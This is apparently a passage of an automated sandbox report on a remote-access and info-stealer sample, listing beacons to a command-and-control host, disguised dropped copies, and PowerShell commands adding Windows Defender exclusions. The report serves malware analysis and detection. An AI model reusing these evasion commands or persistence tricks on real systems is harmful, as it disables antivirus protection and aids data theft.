                                                                                              38192.168.2.44999137.44.238.25080
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:02:21.574626923 CET318OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1040
                                                                                              Expect: 100-continue
                                                                                              Dec 9, 2024 16:02:21.924679041 CET1040OUTData Raw: 59 54 5e 5f 5f 4b 59 5f 5c 5c 56 57 50 5b 5b 59 5f 58 59 54 56 53 51 5e 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: YT^__KY_\\VWP[[Y_XYTVSQ^XR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P E;12_6"7%9?(7;$)(%>P#?%<9D+=?\**&^#,X +
                                                                                              Dec 9, 2024 16:02:22.844572067 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:02:23.077614069 CET158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:02:22 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 4
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 3d 5d 5d 5a
                                                                                              Data Ascii: =]]Z


                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                              39192.168.2.44999737.44.238.25080
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:02:23.370908976 CET318OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1040
                                                                                              Expect: 100-continue
                                                                                              Dec 9, 2024 16:02:23.719099998 CET1040OUTData Raw: 59 5d 5e 51 5a 47 59 5e 5c 5c 56 57 50 50 5b 50 5f 5f 59 5e 56 5c 51 5a 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: Y]^QZGY^\\VWPP[P__Y^V\QZXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P#8""^ :%"%4%*#?B7$*69"?<(?(&^#,X
                                                                                              Dec 9, 2024 16:02:24.641576052 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:02:24.874121904 CET158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:02:23 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 4
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 3d 5d 5d 5a
                                                                                              Data Ascii: =]]Z


                                                                                              Statistics

                                                                                              CPU Usage

                                                                                              Click to jump to process

                                                                                              Memory Usage

                                                                                              Click to jump to process

                                                                                              High Level Behavior Distribution

                                                                                              Click to dive into process behavior distribution

                                                                                              Behavior

                                                                                              Click to jump to process

                                                                                              System Behavior

                                                                                              General

                                                                                              Target ID:0
                                                                                              Start time:09:59:43
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Users\user\Desktop\4si9noTBNw.exe"
                                                                                              Imagebase:0xf60000
                                                                                              File size:1'920'000 bytes
                                                                                              MD5 hash:68EF473852D3AEFD8E5E4F2E00B3DFAA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1813554604.000000001360B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1668520663.0000000000F62000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:4
                                                                                              Start time:09:59:48
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.cmdline"
                                                                                              Imagebase:0x7ff7c67f0000
                                                                                              File size:2'759'232 bytes
                                                                                              MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:5
                                                                                              Start time:09:59:48
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:6
                                                                                              Start time:09:59:48
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe"
                                                                                              Imagebase:0x3d0000
                                                                                              File size:1'920'000 bytes
                                                                                              MD5 hash:68EF473852D3AEFD8E5E4F2E00B3DFAA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Antivirus matches:
                                                                                              • Detection: 68%, ReversingLabs
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:7
                                                                                              Start time:09:59:48
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe"
                                                                                              Imagebase:0x240000
                                                                                              File size:1'920'000 bytes
                                                                                              MD5 hash:68EF473852D3AEFD8E5E4F2E00B3DFAA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:8
                                                                                              Start time:09:59:49
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES39B.tmp" "c:\Windows\System32\CSC5AB1265740184DDC93ABA6EF26458DB.TMP"
                                                                                              Imagebase:0x7ff6dd770000
                                                                                              File size:52'744 bytes
                                                                                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:19
                                                                                              Start time:09:59:50
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Users\Public\AccountPictures\winlogon.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Users\Public\AccountPictures\winlogon.exe
                                                                                              Imagebase:0x920000
                                                                                              File size:1'920'000 bytes
                                                                                              MD5 hash:68EF473852D3AEFD8E5E4F2E00B3DFAA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Public\AccountPictures\winlogon.exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Public\AccountPictures\winlogon.exe, Author: Joe Security
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Avira
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              • Detection: 68%, ReversingLabs
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:21
                                                                                              Start time:09:59:50
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Users\Public\AccountPictures\winlogon.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Users\Public\AccountPictures\winlogon.exe
                                                                                              Imagebase:0x690000
                                                                                              File size:1'920'000 bytes
                                                                                              MD5 hash:68EF473852D3AEFD8E5E4F2E00B3DFAA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:26
                                                                                              Start time:09:59:51
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe'
                                                                                              Imagebase:0x7ff788560000
                                                                                              File size:452'608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:27
                                                                                              Start time:09:59:51
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\VTixufCejPQZEvXiB.exe'
                                                                                              Imagebase:0x7ff788560000
                                                                                              File size:452'608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:28
                                                                                              Start time:09:59:51
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\VTixufCejPQZEvXiB.exe'
                                                                                              Imagebase:0x7ff788560000
                                                                                              File size:452'608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:29
                                                                                              Start time:09:59:51
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              General

                                                                                              Target ID:30
                                                                                              Start time:09:59:51
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\AccountPictures\winlogon.exe'
                                                                                              Imagebase:0x7ff788560000
                                                                                              File size:452'608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:31
                                                                                              Start time:09:59:51
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\en-GB\conhost.exe'
                                                                                              Imagebase:0x7ff788560000
                                                                                              File size:452'608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:32
                                                                                              Start time:09:59:51
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\4si9noTBNw.exe'
                                                                                              Imagebase:0x7ff788560000
                                                                                              File size:452'608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:33
                                                                                              Start time:09:59:51
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:false

                                                                                              General

                                                                                              Target ID:34
                                                                                              Start time:09:59:51
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:false

                                                                                              General

                                                                                              Target ID:35
                                                                                              Start time:09:59:51
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:false

                                                                                              General

                                                                                              Target ID:36
                                                                                              Start time:09:59:51
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:false

                                                                                              General

                                                                                              Target ID:37
                                                                                              Start time:09:59:51
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:false

                                                                                              General

                                                                                              Target ID:38
                                                                                              Start time:09:59:51
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\csCDqY6YZN.bat"
                                                                                              Imagebase:0x7ff64b390000
                                                                                              File size:289'792 bytes
                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:39
                                                                                              Start time:09:59:51
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:40
                                                                                              Start time:09:59:52
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Windows\System32\chcp.com
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:chcp 65001
                                                                                              Imagebase:0x7ff6239c0000
                                                                                              File size:14'848 bytes
                                                                                              MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:41
                                                                                              Start time:09:59:53
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              Imagebase:0x850000
                                                                                              File size:1'920'000 bytes
                                                                                              MD5 hash:68EF473852D3AEFD8E5E4F2E00B3DFAA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:42
                                                                                              Start time:09:59:53
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              Imagebase:0xbd0000
                                                                                              File size:1'920'000 bytes
                                                                                              MD5 hash:68EF473852D3AEFD8E5E4F2E00B3DFAA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:43
                                                                                              Start time:09:59:53
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Program Files\Windows Defender\en-GB\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Windows Defender\en-GB\conhost.exe"
                                                                                              Imagebase:0xa10000
                                                                                              File size:1'920'000 bytes
                                                                                              MD5 hash:68EF473852D3AEFD8E5E4F2E00B3DFAA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Defender\en-GB\conhost.exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Defender\en-GB\conhost.exe, Author: Joe Security
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Avira
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              • Detection: 68%, ReversingLabs
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:44
                                                                                              Start time:09:59:53
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Program Files\Windows Defender\en-GB\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Windows Defender\en-GB\conhost.exe"
                                                                                              Imagebase:0x6c0000
                                                                                              File size:1'920'000 bytes
                                                                                              MD5 hash:68EF473852D3AEFD8E5E4F2E00B3DFAA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:45
                                                                                              Start time:09:59:53
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Windows\System32\PING.EXE
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:ping -n 10 localhost
                                                                                              Imagebase:0x7ff7a6c10000
                                                                                              File size:22'528 bytes
                                                                                              MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:46
                                                                                              Start time:09:59:58
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                              Imagebase:0x7ff693ab0000
                                                                                              File size:496'640 bytes
                                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:48
                                                                                              Start time:10:00:02
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Recovery\VTixufCejPQZEvXiB.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Recovery\VTixufCejPQZEvXiB.exe"
                                                                                              Imagebase:0x4c0000
                                                                                              File size:1'920'000 bytes
                                                                                              MD5 hash:68EF473852D3AEFD8E5E4F2E00B3DFAA
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Antivirus matches:
                                                                                              • Detection: 68%, ReversingLabs
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:49
                                                                                              Start time:10:00:04
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Program Files\Windows Defender\en-GB\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Windows Defender\en-GB\conhost.exe"
                                                                                              Imagebase:0x560000
                                                                                              File size:1'920'000 bytes
                                                                                              MD5 hash:68EF473852D3AEFD8E5E4F2E00B3DFAA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:51
                                                                                              Start time:10:00:07
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:52
                                                                                              Start time:10:00:11
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Users\Public\AccountPictures\winlogon.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Users\Public\AccountPictures\winlogon.exe"
                                                                                              Imagebase:0xe70000
                                                                                              File size:1'920'000 bytes
                                                                                              MD5 hash:68EF473852D3AEFD8E5E4F2E00B3DFAA
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:53
                                                                                              Start time:10:00:19
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Program Files\Windows Defender\en-GB\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Windows Defender\en-GB\conhost.exe"
                                                                                              Imagebase:0xdd0000
                                                                                              File size:1'920'000 bytes
                                                                                              MD5 hash:68EF473852D3AEFD8E5E4F2E00B3DFAA
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:54
                                                                                              Start time:10:00:27
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Users\user\Desktop\4si9noTBNw.exe"
                                                                                              Imagebase:0x980000
                                                                                              File size:1'920'000 bytes
                                                                                              MD5 hash:68EF473852D3AEFD8E5E4F2E00B3DFAA
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:false

                                                                                              General

                                                                                              Target ID:55
                                                                                              Start time:10:00:32
                                                                                              Start date:09/12/2024
                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                              Imagebase:0x7ff6eef20000
                                                                                              File size:55'320 bytes
                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Has exited:false

                                                                                              Disassembly

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:9%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:4
                                                                                                Total number of Limit Nodes:0
                                                                                                execution_graph 6987 7ffd9bc7c94c 6990 7ffd9bc7c94f 6987->6990 6988 7ffd9bc7ca96 QueryFullProcessImageNameA 6989 7ffd9bc7caf4 6988->6989 6990->6988 6990->6990

                                                                                                Executed Functions

                                                                                                Function 00007FFD9B880D4C Relevance: 1.5, Strings: 1, Instructions: 261COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1847957012.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9b880000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 5[_H
                                                                                                • API String ID: 0-3279724263
                                                                                                • Opcode ID: 92d2afdaabcf71dc4404574d3bb2811d20e1be54976a6c47368434e22945eae4
                                                                                                • Instruction ID: ed317ada52be318a8b6ed72acb74e10b50c1df325f812c99c81396fd2fe44544
                                                                                                • Opcode Fuzzy Hash: 92d2afdaabcf71dc4404574d3bb2811d20e1be54976a6c47368434e22945eae4
                                                                                                • Instruction Fuzzy Hash: C2910171A19E8D8FE759DF688869BA97FE1FB99304F4000BED059DB3E2DB7824118700
                                                                                                Function 00007FFD9BC7B5D5 Relevance: 1.8, APIs: 1, Instructions: 259COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1850788531.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9bc70000_4si9noTBNw.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
